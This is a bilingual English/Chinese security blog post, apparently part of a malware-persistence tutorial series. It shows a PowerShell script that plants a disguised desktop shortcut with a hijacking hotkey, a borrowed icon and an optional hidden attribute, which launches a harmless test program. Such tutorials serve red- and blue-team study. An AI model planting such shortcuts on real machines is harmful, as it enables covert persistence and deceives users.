Malware development: persistence – part 23. LNK files. Simple Powershell example.

Hello, cybersecurity enthusiasts and white hackers!
您好，网络安全爱好者和白人黑客！

This post is based on my own research into one of the more interesting malware persistence tricks: via Windows LNK files.
这篇文章基于我自己对一种更有趣的恶意软件持久性技巧的研究：通过 Windows LNK 文件。

LNK

According to Microsoft, an LNK file serves as a shortcut or “link” in Windows, providing a reference to an original file, folder, or application. For regular users, these files serve a meaningful purpose, facilitating file organization and workspace decluttering. However, from an attacker’s perspective, LNK files take on a different significance. They have been exploited in various documented attacks by APT groups and, to my knowledge, remain a viable option for activities such as phishing, establishing persistence, executing payloads.
根据 Microsoft 的说法，文件在 Windows 中充当快捷方式或“链接”，提供对原始 LNK 文件、文件夹或应用程序的引用。对于普通用户来说，这些文件具有有意义的用途，有助于文件组织和工作区整理。但是，从攻击者的角度来看， LNK 文件具有不同的意义。它们已被 APT 组织在各种记录在案的攻击中利用，据我所知，它们仍然是网络钓鱼、建立持久性、执行有效载荷等活动的可行选择。

Do you know that Windows shortcuts can be registered using a shortcut key in terms of execution? This is the main trick for malware persistence in this case.
您知道在执行方面可以使用快捷键注册 Windows 快捷方式吗？在这种情况下，这是恶意软件持久性的主要技巧。

practical example 实例

Let’s say we have a “malware”. As usually, meow-meow messagebox application hack.c:
假设我们有一个“恶意软件”。像往常一样， meow-meow messagebox 应用程序 hack.c ：

/*
hack.c
evil app for windows persistence
author: @cocomelonc
https://cocomelonc.github.io/malware/2023/12/10/malware-pers-23.html
*/
#include <windows.h>
#pragma comment (lib, "user32.lib")

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
  MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK);
  return 0;
}

And then, just create powershell script for create LNK file with the following properties:
然后，只需创建具有以下属性的创建 LNK 文件的 powershell 脚本：

# Define the path for the shortcut on the desktop
$shortcutPath = "$([Environment]::GetFolderPath('Desktop'))\Meow.lnk"

# Create a WScript Shell object
$wshell = New-Object -ComObject Wscript.Shell

# Create a shortcut object
$shortcut = $wshell.CreateShortcut($shortcutPath)

# Set the icon location for the shortcut
$shortcut.IconLocation = "C:\Program Files\Windows NT\Accessories\wordpad.exe"

# Set the target path and arguments for the shortcut
$shortcut.TargetPath = "Z:\2023-12-10-malware-pers-23\hack.exe"
$shortcut.Arguments = ""

# Set the working directory for the shortcut
$shortcut.WorkingDirectory = "Z:\2023-12-10-malware-pers-23"

# Set a hotkey for the shortcut (e.g., CTRL+W)
$shortcut.HotKey = "CTRL+W"

# Set a description for the shortcut
$shortcut.Description = "Not malicious, meow-meow malware"

# Set the window style for the shortcut (7 = Minimized window)
$shortcut.WindowStyle = 7

# Save the shortcut
$shortcut.Save()

# Optionally make the link invisible by adding 'Hidden' attribute
# (Get-Item $shortcutPath).Attributes += 'Hidden'

As you can see, the logic is pretty simple. We simply create a shortcut on the desktop that has a hotkey specified: CTRL+W. Of course, in real attack scenarios it could be something like CTRL+C, CTRL+V or CTRL+P, etc.
正如你所看到的，逻辑非常简单。我们只需在桌面上创建一个指定了热键的快捷方式： CTRL+W .当然，在实际的攻击场景中，它可能是 CTRL+C 或 CTRL+V CTRL+P 等。

For example, if you create a shortcut for Paint, it does not have any hotkey specified:
例如，如果为 Paint 创建快捷方式，则它没有指定任何热键：

Explorer restricts shortcut support to commands beginning with CTRL+ALT. Additional sequences must be set programmatically through COM.
资源管理器将快捷方式支持限制为以 CTRL+ALT 开头的命令。 必须通过 COM 以编程方式设置其他序列。

demo 演示

Let’s go to see everything in action. First of all, compile our “malware”:
让我们去看看一切在行动。首先，编译我们的“恶意软件”：

x86_64-w64-mingw32-g++ -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive

For checking correctness, run it:
要检查正确性，请运行它：

.\hack.exe

The just run our powershell script for persistence:
只需运行我们的 powershell 脚本即可实现持久性：

Get-Content pers.ps1 | PowerShell.exe -noprofile -

As a result, Meow LNK file is created successfully.
结果，Meow LNK 文件创建成功。

If we look at its properties, everything is ok:
如果我们看一下它的属性，一切都很好：

Finally just run it and try to trigger CTRL+W hotkey:
最后，只需运行它并尝试触发 CTRL+W 热键：

As you can see, everything worked perfectly as expected! =^..^= 🙂
如您所见，一切都按预期完美运行！=^..^= 🙂

This technique is used by APT groups like APT28, APT29, Kimsuky and software like Emotet in the wild. In all honesty, this method is widely employed and widespread due to its extreme convenience in deceiving the victims.
这种技术被 APT28、APT29、Kimsuky 等 APT 组织和 Emotet 等软件在野外使用。老实说，这种方法因其欺骗受害者的极端便利而被广泛使用和广泛使用。

I hope this post spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red teamers arsenal.
我希望这篇文章能让蓝队员们了解这种有趣的技术，并为红队队员的武器库增添一把武器。

Many thanks to my friend and colleague Anton Kuznetsov, he reminded me of this technique when he presented one of his most amazing talks.
非常感谢我的朋友和同事安东·库兹涅佐夫，当他发表他最精彩的演讲之一时，他让我想起了这种技巧。

This is a practical case for educational purposes only.
这是一个仅用于教育目的的实际案例。

ATT&CK MITRE: T1204.001
ATT&CK 斜接：T1204.001
APT28 APT28系列
APT29 APT29型
Kimsuky 金苏基
Emotet 表情符号
MSDN: Shell Link (.LNK) Binary File Format
MSDN：Shell 链接 （.LNK） 二进制文件格式
Malware persistence: part 1
恶意软件持久性：第 1 部分
source code in github
GitHub 中的源代码

Thanks for your time happy hacking and good bye!
感谢您抽出宝贵时间，祝您黑客愉快，再见！
PS. All drawings and screenshots are mine
所有图纸和截图都是我的

原文始发于cocomelonc：Malware development: persistence – part 23. LNK files. Simple Powershell example.